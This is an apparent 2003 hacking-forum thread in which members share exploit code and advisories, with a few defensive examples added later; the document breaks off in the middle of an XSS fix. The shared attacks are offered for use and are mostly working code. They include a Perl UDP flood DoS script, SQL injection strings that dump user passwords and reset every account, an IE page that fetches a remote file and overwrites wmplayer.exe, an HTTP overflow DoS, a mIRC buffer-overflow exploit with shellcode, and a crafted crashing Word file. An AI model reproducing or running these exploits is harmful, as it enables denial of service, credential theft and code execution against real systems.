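    return DISPLAY_OK;
}

extern char **environ;

int main(void)
{
    char buf[DISPLAY_MAX + 1];
    enum display_rc rc = get_display(environ, buf, sizeof buf);
    if (rc == DISPLAY_OK)
        printf("DISPLAY accepted: %s\n", buf);
    else
        printf("DISPLAY rejected or unset (code %d)\n", (int)rc);
    return 0;
}
```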
hi guys, how are you
I was away for a few days, sorry
but take this
:d
bye
a few new codes:
--
Posted on 29 September 2003
From: <res076cf(at)alltel.net>
Howdy,
Tested on an SMC2404WBR - BarricadeT Turbo 11/22 Mbps Wireless Cable/DSL Broadband Router.
Sending a stream of UDP random packets to multiple ports 0-65000 on the router will cause the router to freeze until a soft reset is performed on it. In one case, the router did survive but did not come back "alive" for around 15 minutes. All other tries (2 others) the router had to be reset. This attack was performed using the Zonealarm+Windows 98 DoS code written by _6mO_HaCk.
The code follows:
-----------------snip---------------------
#!/usr/bin/perl
use Socket;
system(clear);
print "\n";
print "--- ZoneAlarm Remote DoS Xploit\n";
print "---\n";
print "--- Discovered & Coded By _6mO_HaCk\n";
print "\n";
if(!defined($ARGV[0]))
{
&usage
}
my ($target);
$target=$ARGV[0];
my $ia = inet_aton($target) || die ("[-] Unable to resolve
$target");
socket(DoS, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$target");
print " DoSing $target ... wait 1 minute and then CTRL+C to stop\n";
for (;;) {
$size=$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x $rand x
$rand x $rand;
$port=int(rand 65000) +1;
send(DoS, 0, $size, sockaddr_in($port, $iaddr));
}
sub usage {die("\n\n Usage : perl $0 <Target>\n\n");}
-----------------------snip--------------------------------------
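Added example, not part of the post or _6mO_HaCk's code: detection for the traffic pattern described above (one source sending UDP datagrams to a spread of random destination ports). It reads constructed flow-log lines in an assumed "src dst proto dport" format, keeps a per-source bitmap of distinct destination ports, and reports sources over an assumed threshold of 100 ports; the log format, the threshold and the sample lines are my assumptions.

```c
/* Added example (not from the post or the DoS code): detection for the pattern
 * described above, one source spraying UDP datagrams at many random destination
 * ports. Input is constructed flow-log text in an assumed "src dst proto dport"
 * format; a per-source bitmap counts distinct destination ports. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define MAX_SRC 8
#define FLOOD_PORT_THRESHOLD 100  /* assumed: benign hosts touch a handful of ports */

struct src_stat {
    char src[46];              /* fits an IPv6 literal */
    uint8_t ports[65536 / 8];  /* one bit per destination port seen */
    unsigned distinct;
};
struct flood_table { struct src_stat s[MAX_SRC]; int n; };

/* Find the entry for src, creating it when create is set and there is room. */
static struct src_stat *table_find(struct flood_table *t, const char *src, int create)
{
    for (int i = 0; i < t->n; i++)
        if (strcmp(t->s[i].src, src) == 0)
            return &t->s[i];
    if (!create || t->n == MAX_SRC)
        return NULL;
    struct src_stat *e = &t->s[t->n++];
    memset(e, 0, sizeof *e);
    snprintf(e->src, sizeof e->src, "%s", src);
    return e;
}

/* Count one log line; returns 1 if it was a well-formed UDP record. */
int flood_feed(struct flood_table *t, const char *line)
{
    char src[46], dst[46], proto[8];
    unsigned port;
    if (sscanf(line, "%45s %45s %7s %u", src, dst, proto, &port) != 4)
        return 0;
    if (strcmp(proto, "udp") != 0 || port > 65535)
        return 0;
    struct src_stat *e = table_find(t, src, 1);
    if (!e)
        return 0;
    uint8_t bit = (uint8_t)(1u << (port & 7));
    if (!(e->ports[port >> 3] & bit)) {
        e->ports[port >> 3] |= bit;
        e->distinct++;
    }
    return 1;
}

/* Feed newline-separated text; returns the number of lines counted. */
int flood_feed_text(struct flood_table *t, const char *text)
{
    int counted = 0;
    char line[256];
    while (*text) {
        size_t n = strcspn(text, "\n");
        if (n < sizeof line) {
            memcpy(line, text, n);
            line[n] = '\0';
            counted += flood_feed(t, line);
        }
        text += n + (text[n] == '\n');
    }
    return counted;
}

/* Distinct destination ports seen from src, or -1 if src is unknown. */
int flood_distinct(struct flood_table *t, const char *src)
{
    struct src_stat *e = table_find(t, src, 0);
    return e ? (int)e->distinct : -1;
}

/* Number of sources over threshold; the first offender's address goes to out. */
int flood_report(const struct flood_table *t, char *out, size_t outsz)
{
    int hits = 0;
    for (int i = 0; i < t->n; i++)
        if (t->s[i].distinct >= FLOOD_PORT_THRESHOLD && hits++ == 0 && out)
            snprintf(out, outsz, "%s", t->s[i].src);
    return hits;
}

/* Constructed sample log (not real traffic): one host hitting 150 distinct ports,
 * one host doing two DNS lookups and a TCP connect, plus a malformed line. */
size_t flood_sample(char *buf, size_t bufsz)
{
    size_t off = 0;
    for (unsigned i = 0; i < 150 && off + 40 < bufsz; i++)
        off += (size_t)snprintf(buf + off, bufsz - off,
                                "10.0.0.99 192.168.1.1 udp %u\n", (i * 7919u) % 65536u);
    if (off + 120 < bufsz)
        off += (size_t)snprintf(buf + off, bufsz - off, "10.0.0.5 192.168.1.1 udp 53\n"
           "10.0.0.5 192.168.1.1 udp 53\n10.0.0.5 192.168.1.1 tcp 80\nthis line is garbage\n");
    return off;
}
```

Feed real flow records line by line with flood_feed and poll flood_report periodically; a benign host rarely exceeds a few dozen distinct destination ports per window.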
hi
new codes are comin :d
------------
the newest:
---
Posted on 02 October 2003
From: Bahaa Naamneh <[Only registered and activated users can see links]>
-------------------------------------
Affected Systems: OmniCom WinShadow
Version: 2.0 (and possibly earlier versions)
Vendor: OmniCom Technologies
- [Only registered and activated users can see links]
Issue: 1. Buffer overflow in client handling hostnames in host files
2. DoS against server
Released: 27 September 2003
Introduction:
=============
"winShadow: Create a secure remote control session on the Internet or private WAN/LAN network allowing easy access to remote files and applications. Increase productivity by allowing secure remote access for mobile users and system administrators."
- Vendor's Description
[ [Only registered and activated users can see links] ]
Details:
========
Multiple vulnerabilities have been identified in winShadow version 2.0, which allow malicious users to execute arbitrary code on the master client and remotely crash the server.
Buffer Overflow:
----------------
winShadow saves hostnames in host files (*.osh); the process handling the hostname parameter read from the file will cause a buffer overflow if approximately 250 bytes are passed after this parameter.
Denial of Service:
------------------
By connecting to the server and issuing a long username or password, the server will crash, refusing any further connections until the server is closed by logging off or rebooting the system; this may be because it is a service that runs with system privileges.
Vendor status:
==============
The vendor has been informed.
Exploit:
========
Can be downloaded from [Only registered and activated users can see links]
The exploit was written by Peter Winter-Smith.
Discovered by/Credit:
=====================
Bahaa Naamneh
[Only registered and activated users can see links]
[Only registered and activated users can see links]
the last for today
-----
Posted on 02 October 2003
From: Lifo Fifo <[Only registered and activated users can see links]>
Never use this product if you have turned off magic_quotes_gpc. And this product won't work anyway if you have turned off register_globals.
All the files in the product don't check the integrity of variables. You can easily exploit this using some SQL injection techniques. For example, if you want to get the username/password of all the users, you can exploit advertiser.php.
Open it like,
[Only registered and activated users can see links]' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile 'c:/apache2/htdocs/dcpad.txt
This is for windows, if web-server is running on *nix, then you could enter something like,
[Only registered and activated users can see links]' or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile '/var/[Only registered and activated users can see links]
In these cases, you will need to enter the absolute path. For that, run the following:
[Only registered and activated users can see links]' and that will show the path to the server if they have turned on display_errors in php.ini.
That's all ! Notice that here we are using UNION function in query. For that, the host should be running version MySQL 4.x. Well, if it's not running 4.x, No problem, we have another file !
This time it's lostpassword.php.
Open it like,
[Only registered and activated users can see links]' or 1=1--'
This will really cause some damage. It will reset everyone's password. Everyone will get as many mails as the number of users. And everyone's password will be the one provided in the last email.
I didn't have time to check if there was injection possible with some numeric field. If it's there, one can launch select-fish attacks, which would work even in case of magic_quotes_gpc is on.
Fix: Instead of fixing it, simply turn on magic_quotes_gpc. Otherwise it will take you as much time as they took in making DCP Portal.
-lifofifo
[Only registered and activated users can see links]
this might be useful to you
hi folks :
here is the link :d : [Only registered and activated users can see links]
In order for the recent IE exploits that have been posted here to actually work, you MUST do a couple of things. . .
First, visit :[Only registered and activated users can see links] Fdienste%2Fbrowsercheck%2Fdemos%2Fie%2Fe5_15.shtml&langpair=de%7Cen&hl=de&ie=UTF8&oe=UTF8
After reading this, you should realize that you cannot use this exploit unless you have your own server set up on your computer. I recommend you go and download Apache and see how it works. Then get used to the configuration. . . .
When you do that, it should be clear to you from the link above what you must do. Try searching google on the topic of configuration of content-type: application/hta on apache. It's not that difficult, and I'm not going to spoon feed it to you any more than I already have, which is probably too much. I'm hoping that people only use this for "educational" purposes, which is what it will be for if you set up the server on your own computer and don't register it with DNS.
I also think that we owe illwill more than most people think because, if it were not for him, we would not have even been exposed to this exploit for research and discussion; and only research and discussion. He has posted before that his exploits are not for the general masses to use, and therefore we should respect him and not use this in the wild.
here is the code :
--
/************************************************************************
* Appshutdown.c
*
* Demonstrates the use of PostThreadMessage to;
* - shutdown any application with a message handler
*
* The window title can be specified in code or on the command line
*
* Works against any application/service process that
* has implemented a message handler
*
 ************************************************************************/
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
long hWnd;
unsigned long proc;
HWND myhwnd;
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage\n");
printf("%% [Only registered and activated users can see links]\n\n");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;
printf("+ Finding %s Window...\n",pWindow);
hWnd = (long)FindWindow(NULL,pWindow);
myhwnd = FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window\n",pWindow);
return 0;
}
printf("+ Found Main Window At...0x%xh\n",hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(myhwnd,
&proc);
if(hThread == NULL)
{
printf("Failed\n");
return 0;
}
printf("0x%xh Process 0x%xh\n",hThread,proc);
printf("+ Send Quit Message\n");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...\n");
return 0;
}
---
hi all
---
Windows Media Player + IE6 XML bypass flaw exploit
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "[Only registered and activated users can see links]",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
Please wait a few seconds...<br>
Microsoft has released a new patch which they say fixes this vulnerability.
I have checked with 6 people who have downloaded the patch, including myself,
and whenever I try wmp.htm, the vb app runs.
<br>
If it doesn't work the first time, press refresh (It's IE, sometimes it works
and sometimes it decides not to)
<p>
As a solution you should click Tools-Internet Options and then press the Advanced
Tab. Now scroll down to Multimedia and check the box (usually the first one) that
says "Don't display online content media in the media bar".
<p>
- Mindwarper
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}
window.open("ieerror.php","_media");
setTimeout("doit()", 5000);
</script>
myPHPNuke is a content management system written in PHP. An SQL Injection vulnerability in the product allows remote attackers to insert malicious arbitrary SQL statements into those used by the product allowing compromise of the server and database.
Details
Vulnerable systems:
* myPHPnuke version 1.8.8
Vulnerable code:
In the auth.inc.php file:
if ((isset($aid)) && (isset($pwd)) && ($op == "login")) {
if($aid!="" AND $pwd!="") {
$q="select pwd from ".$mpnTables['authors']." where aid='$aid'";
$result=mysql_query("select pwd from ".$mpnTables['authors']." where aid='$aid'");
list($pass)=mysql_fetch_row($result);
if ($pass == $pwd) {
$pwd1 = md5($pwd);
mysql_query("update ".$mpnTables['authors']." set pwd = '$pwd1' where aid='$aid'");
$pass = $pwd1;
} else {
$pwd1 = md5($pwd);
}
if($pass == $pwd1) {
$admin = base64_encode("$aid:$pwd1");
setcookie("admin", "$admin", time()+2592000, "", "", ""); // 1 mo is 2592000
}
}
}
As you can see $aid is not checked. Therefore, you can run the query like:
select pwd from mpn_authors where aid='mad' into outfile '/filepath/file.txt'
When you enter:
aid=mad' into outfile '/filepath/file.txt
Workaround:
This vulnerability will not work if magic_quotes_gpc is set to on.
Fix:
Find the line:
if ((isset($aid)) && (isset($pwd)) && ($op == "login")) {
if($aid!="" AND $pwd!="") {
And add to it:
$aid=addslashes($aid);
this one isn't bad either
---
The following steps can be performed in order to create a proof of
concept Word document:
1. Open Word.
2. Save .doc file.
3. Modify .doc file by using binary editor as follows:
these lines were taken from a .doc file of Microsoft Word 2002 (10.2627.3311):
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 00 00 00 00 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
4. Change them as follows:
00 00 00 00 00 a3 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01
00 00 62 62 62 62 b4 01 00 00 20 00 00 00 9c 01 00 00 00 00 00 00 9c
01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00 9c 01 00 00 00 00 00 00
-------
5. Open modified .doc file.
6. Microsoft Word will crash.
---
if someone makes it remote, that would be great
hi
---
#include <windows.h>
#include <winsock.h>
#include <stdio.h> /* printf/puts */
#pragma comment (lib,"wsock32.lib")
#define PerfectOverwrite 246
int main (int argc, char *argv[])
{
int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
" [Only registered and activated users can see links]");
if (!argv[1])
{
printf ("Usage : %s <IP Address>\n", argv[0]);
ExitProcess (0);
}
if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);
if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0);
};
lstrcat (sav, "GET / [Only registered and activated users can see links]");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");
sin.sin_family = AF_INET;
sin.sin_port = htons (80);
if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}
sock1 = socket (AF_INET, SOCK_STREAM, 0);
printf ("\nconnecting to %s...", argv[1]);
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");
else
{
printf ("ok!\nSending crafted request...");
send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
}
closesocket (sock1);
}
---
--
#include <windows.h>
#include <commctrl.h>
#include <stdio.h>
char tWindow[]="Windows Task Manager";// The name of the main window
char* pWindow;
int main(int argc, char *argv[])
{
HWND hWnd; // window handle, as FindWindow returns it
DWORD proc; // process id filled in by GetWindowThreadProcessId
DWORD hThread;
printf("%% AppShutdown - Playing with PostThreadMessage\n");
printf("%% [Only registered and activated users can see links]\n\n");
// Specify Window Title On Command Line
if (argc ==2)
pWindow = argv[1];
else
pWindow = tWindow;
printf("+ Finding %s Window...\n",pWindow);
hWnd = FindWindow(NULL,pWindow);
if(hWnd == NULL)
{
printf("+ Couldn't Find %s Window\n",pWindow);
return 0;
}
printf("+ Found Main Window At...%p\n",(void *)hWnd);
printf("+ Finding Window Thread..");
hThread = GetWindowThreadProcessId(hWnd,&proc);
if(hThread == NULL)
{
printf("Failed\n");
return 0;
}
printf("0x%xh Process 0x%xh\n",hThread,proc);
printf("+ Send Quit Message\n");
PostThreadMessage((DWORD) hThread,(UINT) WM_QUIT,0,0);
printf("+ Done...\n");
return 0;
}
--
guys, just enjoy :d
----
Title: Default password (db2fenc1) for db2fenc1
ID: 11860 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host
---------------------------------------------------------------
Title: Default password (ibmdb2) for db2as
ID: 11863 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host
---------------------------------------------------------------
Title: Default password (ibmdb2) for db2fenc1
ID: 11861 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host
---------------------------------------------------------------
Title: Default password (db2inst1) for db2inst1
ID: 11862 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host
---------------------------------------------------------------
Title: Default password (ibmdb2) for db2inst1
ID: 11859 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host
---------------------------------------------------------------
Title: Default password (db2as) for db2as
ID: 11864 Risk Level: High
Category: Default Unix Accounts
URL: [Only registered and activated users can see links]
Summary: Logs into the remote host
---------------------------------------------------------------
Title: SOCKS server detection
ID: 11865 Risk Level: Other
Category: Misc.
URL: [Only registered and activated users can see links]
Summary: Detect & inspect SOCKS4/5 servers
---------------------------------------------------------------
Title: RemoteNC detection
ID: 11855 Risk Level: High
Category: Backdoors
URL: [Only registered and activated users can see links]
Summary: Determines the presence of RemoteNC
---------------------------------------------------------------
Title: Apache < 2.0.48
ID: 11853 Risk Level: Low
Category: Misc.
URL: [Only registered and activated users can see links]
Summary: Checks for version of Apache
---------------------------------------------------------------
Title: Cafe Wordpress SQL injection
ID: 11866 Risk Level: High
Category: CGI abuses
URL: [Only registered and activated users can see links]
Summary: Checks for the presence of cafe wordpress
---------------------------------------------------------------
Title: FsSniffer Detection
ID: 11854 Risk Level: High
Category: Backdoors
URL: [Only registered and activated users can see links]
Summary: Determines the presence of FsSniffer
---------------------------------------------------------------
Title: BIND Buffer overflows in the DNS stub resolver library
ID: 11857 Risk Level: High
Category: Gain root remotely
URL: [Only registered and activated users can see links]
Summary: Checks that BIND is not version 4.9.2 through 4.9.10
---------------------------------------------------------------
Title: iPlanet unauthorized sensitive data retrieval
ID: 11856 Risk Level: High
Category: Gain root remotely
URL: [Only registered and activated users can see links]
Summary: Check for vulnerable version of iPlanet Webserver
---------------------------------------------------------------
Title: TTL Anomaly detection
ID: 11858 Risk Level: Low
Category: General
URL: [Only registered and activated users can see links]
Summary: Check for TTL anomalies on the remote host
Hi guys, I saw this in several places, so I'm putting it in a txt file (it's 3 articles); better than having them separate.
:*
bye
---
-----------
By the way, you'll definitely need this:
Official: crackers have broken into GPRS billing
----
Cisco warns its WLAN security can be cracked
----
Trojan program uses Internet Explorer hole to hijack browsers
------
I'm back after a week :D
----
7 vulnerabilities
---
Title: WinSyslog (DoS)
ID: 11884 Risk Level: High
Category: Denial of Service
Summary: Attempts to crash the remote host
---------------------------------------------------------------
Title: Buffer Overflow in Windows Troubleshooter ActiveX Control (826232)
ID: 11887 Risk Level: High
Category: Windows
Summary: Checks for hotfix Q826232
---------------------------------------------------------------
Title: Vulnerability in Authenticode Verification Could Allow Remote Code Execution (823182)
ID: 11886 Risk Level: High
Category: Windows
Summary: Checks for hotfix Q823182
---------------------------------------------------------------
Title: Buffer Overrun in Messenger Service (828035)
ID: 11888 Risk Level: High
Category: Windows
Summary: Checks for hotfix Q828035
---------------------------------------------------------------
Title: AOL Instant Messenger is Installed
ID: 11882 Risk Level: Low
Category: Windows
Summary: Determines if AOL Instant Messenger is installed
---------------------------------------------------------------
Title: Gator/GAIN Spyware Installed
ID: 11883 Risk Level: Other
Category: Windows
Summary: Determines if Gator Spyware is installed
---------------------------------------------------------------
Title: Buffer Overrun in the ListBox and in the ComboBox (824141)
ID: 11885 Risk Level: Other
Category: Windows
Summary: Checks for hotfix Q824141
---------------------------------------------------------------
Title: myPHPcalendar injection
ID: 11877 Risk Level: High
Category: CGI abuses
Summary: Checks for the presence of contacts.php
---------------------------------------------------------------
Title: OpenSSL overflow via invalid certificate passing
ID: 11875 Risk Level: High
Category: Gain a shell remotely
Summary: Checks for the behavior of SSL
---------------------------------------------------------------
Title: gallery code injection (2)
ID: 11876 Risk Level: High
Category: CGI abuses
Summary: Checks for the presence of setup/index.php
---------------------------------------------------------------
Title: Fluxay Sensor Detection
ID: 11880 Risk Level: High
Category: Backdoors
Summary: Determines the presence of Fluxay Sensor
---------------------------------------------------------------
Title: IIS Service Pack - 404
ID: 11874 Risk Level: High
Category: CGI abuses
Summary: IIS Service Pack Check
---------------------------------------------------------------
Title: Compaq Web-based Management Login
ID: 11879 Risk Level: High
Category: General
Summary: Checks Compaq Web-based Management Agent for Default Administrator Password
---------------------------------------------------------------
Title: Buffer Overrun In HTML Converter Could Allow Code Execution (823559)
ID: 11878 Risk Level: High
Category: Windows
Summary: Checks for hotfix Q823559
---------------------------------------------------------------
Title: SMB Registry : permissions of the Microsoft Transaction Server key
ID: 11867 Risk Level: High
Category: Windows
Summary: Determines the access rights of a remote key
---------------------------------------------------------------
Title: Find if IIS server allows BASIC and/or NTLM authentication
ID: 11871 Risk Level: Low
Category: Misc.
Summary: Find IIS authentication scheme
---------------------------------------------------------------
Title: Wollf backdoor detection
ID: 11881 Risk Level: High
Category: Backdoors
Summary: Determines the presence of Wollf
---------------------------------------------------------------
Title: Microsoft's SQL version less than or equal to 7
ID: 11870 Risk Level: High
Category: Windows
Summary: Microsoft SQL less than or equal to 7 may be misconfigured
---------------------------------------------------------------
Title: SMB Registry : permissions of the SNMP key
ID: 11868 Risk Level: High
Category: Windows
Summary: Determines the access rights of a remote key
---------------------------------------------------------------
Title: ODBC tools check
ID: 11872 Risk Level: High
Category: CGI abuses
Summary: Checks for the presence of ODBC tools
---------------------------------------------------------------
Title: PayPal Store Front code injection
ID: 11873 Risk Level: High
Category: CGI abuses
Summary: Checks for the presence of index.php
It seems to be a mIRC exploit
-----
/*
** remote mirc < 6.11 exploit by blasty
**
** TESTED ON: Windows XP (No SP, Dutch) Build: 2600.xpclient.010817-1148
**
** A few days ago, I saw a mIRC advisory on packetstorm [1] and was surprised
** nobody had written an exploit yet. So I decided to start writing one.
** Since this was my first time coding an exploit for Windows, it took some
** research before I got the hang of it. (Ollydbg is much more confusing than GDB btw )
**
** This exploit (ab)uses the bug in irc:// URI handling. It contains a buffer
** overflow, and when more than 998 bytes are given EIP will be overwritten.
**
** At first I was thinking of a simple solution to get this exploitable. Since
** giving a URI with > 998 chars to someone on IRC is simply NOT done.
** Then I remembered the iframe-irc:// flaw found by uuuppzz [2]
**
** This exploit will write a malicious HTML file containing an iframe executing the
** irc:// address. So you can give this to anyone on IRC for example.
** The shellcode included only executes cmd.exe, because I don't want this to be
** a scriptkiddy util. But replacing the shellcode with your own is also possible.
** A 400-byte shellcode (bindshell etc.) easily fits in the buffer, but it may require
** some tweaking.
** After exiting cmd.exe mIRC will crash, so the shellcode is not 100% clean, but who carez
**
** Oh yeah, I almost forgot.. this exploit also works even if mIRC isn't started.
** mIRC will start automatically when an irc:// is executed, so you can also send somebody
** an HTML email containing the evil HTML code. (only for poor clients like Outlook Express )
**
**/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Stupid cmd.exe exec shellcode. hey! I r !evil */
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8"
"\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system()
"\xff\xd0"; // call system()
char jmpback[] =
"\xE9\xCF\xFB\xFF\xFF"; // my leet negative JMP shellcode
char buffer[1100], fstring[1300]; // heh, need to clean this up
int main(int argc, char *argv[]) {
FILE *evil;
fprintf(stdout, "---------------------------------------------\n"
"mIRC < 6.11 remote exploit by [Only registered and activated users can see links]\n"
"Exploit downloaded on [Only registered and activated users can see links]"
"---------------------------------------------\n\n");
// NOPslides are cool
memset(buffer, 0x90, sizeof(buffer) - 1);
// place shellcode in buffer
memcpy(buffer + 20, shellcode, strlen(shellcode));
// took this one from ntdll.dll (jmp esp)
*(long *)&buffer[994] = 0x77F4801C;
// place jmpback shellcode in buffer
memcpy(buffer + 20 + strlen(shellcode) + 1010, jmpback, strlen(jmpback));
printf("[+] Evil buffer constructed\n");
// open HTML file for writing
if((evil = fopen("index.html", "a+")) != NULL) {
// construct evil string
sprintf(fstring, "<iframe src=\"irc://%s\"></iframe>", buffer);
// write string to file
fputs(fstring, evil);
// close file
fclose(evil);
printf("[+] Evil HTML file written!\n");
return(0);
} else {
// uh oh.. :/
fprintf(stderr, "ERROR: Could not open index.html for writing!\n");
exit(1);
}
}
------------
Title: nibindd is running
ID: 11899 Risk Level: Medium
Category: RPC
Summary: Connects to the remote nibindd RPC service
---------------------------------------------------------------
Title: Obtain /etc/passwd using NetInfo
ID: 11898 Risk Level: Other
Category: General
Summary: Uses NetInfo to read /etc/passwd remotely
---------------------------------------------------------------
Title: Opera web browser HREF overflow
ID: 11900 Risk Level: High
Category: Windows
Summary: Determines the version of Opera.exe
---------------------------------------------------------------
Title: DB2 discovery service DOS
ID: 11896 Risk Level: Low
Category: Denial of Service
Summary: A too long UDP packet kills the remote service
---------------------------------------------------------------
Title: NetInfo daemon
ID: 11897 Risk Level: Medium
Category: General
Summary: Checks for the presence of NetInfo
---------------------------------------------------------------
Title: LinkSys EtherFast Router Denial of Service Attack
ID: 11891 Risk Level: High
Category: Denial of Service
Summary: URL results in DoS of Linksys router
---------------------------------------------------------------
Title: TinyWeb 1.9
ID: 11894 Risk Level: High
Category: Misc.
Summary: Checks for version of TinyWeb
---------------------------------------------------------------
Title: Gnu Cfserv remote buffer overflow
ID: 11893 Risk Level: High
Category: Gain root remotely
Summary: Checks for the Cfserver remote buffer overflow
---------------------------------------------------------------
Title: Buffer Overrun in Messenger Service (real test)
ID: 11890 Risk Level: High
Category: Windows
Summary: Checks for hotfix Q828035
---------------------------------------------------------------
Title: SCO OpenServer multiple vulnerabilities
ID: 11895 Risk Level: High
Category: General
Summary: Checks the remote SCO OpenServer
---------------------------------------------------------------
Title: Exchange XEXCH50 Remote Buffer Overflow
ID: 11889 Risk Level: High
Category: SMTP problems
Summary: Tests to see if authentication is required for the XEXCH50 command
---------------------------------------------------------------
Title: Citrix redirection bug
ID: 11892 Risk Level: Medium
Category: Windows
Summary: Citrix Redirection detection
Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3)
/* Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3) */
/* Must be used with the associated shell */
/* */
/* This exploit works against unpatched systems (MS03-039) */
/* And causes a Denial of Service on patched systems (rpc3) */
Cross-Site Java breaks Sandbox Isolation for Unsigned Applets
Date: 2003-10-21
Security-Corporation ID : SC-0715
Author : Marc Schoenefeld
Product : Java Plugin
---
I saw this; give your opinions:
----
ie-cache-script-injection (12961) Medium Risk
Microsoft Internet Explorer browser cache script injection
Description:
Microsoft Internet Explorer versions 5.0.1, 5.5, and 6.0 could allow a remote attacker to execute script on a victim's computer, caused by a vulnerability when Internet Explorer checks for the existence of local files in the browser's cache. A remote attacker could create a malicious Web page that would allow the attacker to bypass the cross-domain security model. This could allow an attacker to cause the execution of malicious script within the victim's "My Computer" security zone, once the page is visited.
Platforms Affected:
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 6.0
Windows Any version
Vivisimo Clustering Engine Input Validation Flaw Permits Remote Cross-Site Scripting Attacks
-------------------------------------------
SecurityTracker Alert ID: 1007955
CVE Reference: GENERIC-MAP-NOMATCH
Date: Oct 18 2003
Impact: Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included: Yes
Description: ComSec of governmentsecurity.org reported an input validation vulnerability in the Vivisimo Clustering Engine. A remote user can conduct cross-site scripting attacks.
It is reported that the Clustering Engine does not filter HTML code from user-supplied input before displaying the input as part of a search query results. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the Clustering Engine software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
A demonstration exploit URL is provided:
[Only registered and activated users can see links][target]/search?query=<script>alert("Hello" )</script><script>alert("goodbye")</script>
Impact: A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Clustering Engine, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution: No solution was available at the time of this entry.
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: ComSec
Message History: None.
Vendor...now informed
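The reported flaw (the search term echoed unescaped into the results page) beside the output-encoding fix, plus a log check for the same pattern, as an added Python example that is not part of the alert or of Vivisimo's own code; the host name, the access-log lines and all function names are constructed for the demonstration.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample: the demonstration URL quoted in the alert, with a
# placeholder host (the alert does not give one).
DEMO_URL = ('http://vivisimo.example/search?query='
            '<script>alert("Hello" )</script><script>alert("goodbye")</script>')


def query_from_url(url: str) -> str:
    """Return the 'query' parameter exactly as the engine receives it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("query", [""])[0]


def render_results_vulnerable(query: str, hits: list) -> str:
    """Echoes the search term into the HTML unescaped: the reported flaw."""
    items = "".join(f"<li>{h}</li>" for h in hits)
    return f"<h1>Results for {query}</h1><ul>{items}</ul>"


def render_results_fixed(query: str, hits: list) -> str:
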